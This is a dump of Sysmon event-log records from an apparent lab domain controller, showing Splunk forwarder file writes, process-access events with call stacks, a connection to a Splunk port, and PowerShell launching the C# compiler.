23542300x80000000000000002243733Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.592{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F74093F50630C3BFE6485802F8C80BCB,SHA256=3AD6DFE80A016EC08606740F6DE3BF6AB7C8AEA043DA7A538B22AE1E28AC901A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243732Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.326{05ADC7E1-6E24-603E-F0AA-00000000AD01}1088411444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002243731Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.186{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CB821CA9375D8155E10AFED214596EC1,SHA256=A2CF2DA323664FEA52CE783EFB972ED5997B8BA5F41CB084077C9A545FFC8411,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243730Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.139{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EABDA140776177B9135E862CD02931C0,SHA256=575C1D7BB731E1D995FCDFB7F85751B2C37B5FBC9C58E07DF0E36333369C0A75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243729Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.139{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=85458F162F3045BF91579A5A5D9A2BBD,SHA256=6FD89829B00318043F73C66E98CC0B3DC17C1EBDB809434287FD54DEA39629C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243728Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.139{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ABC80466B5CDE15CBB3673769978BBD5,SHA256=6634C0835882A61E6BCDE23089316359E550D955D6BD19E5A1361D5946D5E540,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243727Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.139{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E24-603E-F0AA-00000000AD01}10884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243726Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.139{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243725Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.139{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243724Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.139{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243723Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.139{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243722Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.139{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6E24-603E-F0AA-00000000AD01}10884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243721Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.139{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E24-603E-F0AA-00000000AD01}10884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002243720Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.140{05ADC7E1-6E24-603E-F0AA-00000000AD01}10884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002243745Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:05.155{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34BBE926EFE50CA42AC24CE000A481C5,SHA256=AFA07CD214B28192B39CF857719A23E66BE0DD9F7742147C7FE61C92FB30D42C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243744Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:05.155{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F28D2C2CFC461B2C724BF1DB5FBE15AE,SHA256=1DFA49CF8082BB38C68BB5324FC78A5815BEE817D221D50F5FE8D3D342F7A938,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243743Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:04.998{05ADC7E1-6E24-603E-F1AA-00000000AD01}1421213952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002243747Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:06.811{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DEE922D208C3E59FAED4C8B06ED95C00,SHA256=1459A6A47A9D0E4E9F4DE4531F34BF8327D6872FFCC5123705822163A32D4279,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243746Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:06.173{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D448E4C74495C4DCE22FF1B23CC6E49,SHA256=7ED6E73AF3168DB690C37BBC2303382D32CB9C32689B21550056F8DF40F976E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243748Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:07.186{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD16002E9D532C23F6BBCC41D9E171E8,SHA256=24AFE2A11E2E7012628D0DDFFADF9158AA4E37663658AE776C438556B8C4287B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243749Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:08.217{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F41EB14B62F4DEC40C2AA91DC92E69CA,SHA256=E919DBB795372A4FAF37BC52DD1DA6B553E1B14AE6A3F355848F807F7AFF94F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243752Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:59.332{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60179-false10.0.1.12-8000- 23542300x80000000000000002243751Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:09.233{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA5B910B93B53DEABA38B9F24EE9FBAE,SHA256=85000B8E70464F4E3D2062CA01E9BB06833BD6A853527D8A81C1CC4A25353CF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243750Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:09.201{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D776A086B33B052CDD84540CC115001D,SHA256=65BE1516CE543AAA083A289BD6FAD3A59E3A2F71D0C6981747E41759C8B59573,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243780Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.951{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9C40B0750A5D571A01E77E380AB7D5A1,SHA256=52802966087711A2C7F94773DB325BAD31A1EB3453223A1581F03A98DD33F2A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243779Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.951{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E2A-603E-F4AA-00000000AD01}14820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243778Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.951{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243777Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.951{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243776Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.951{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243775Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.951{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243774Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.951{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6E2A-603E-F4AA-00000000AD01}14820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243773Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.951{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E2A-603E-F4AA-00000000AD01}14820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\8052f993fc8b33a503daf487ee7faec3\Microsoft.PowerShell.Commands.Utility.ni.dll+29809e40(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\8052f993fc8b33a503daf487ee7faec3\Microsoft.PowerShell.Commands.Utility.ni.dll+29809e40(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d8357(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64) 154100x80000000000000002243772Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.957{05ADC7E1-6E2A-603E-F4AA-00000000AD01}14820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths 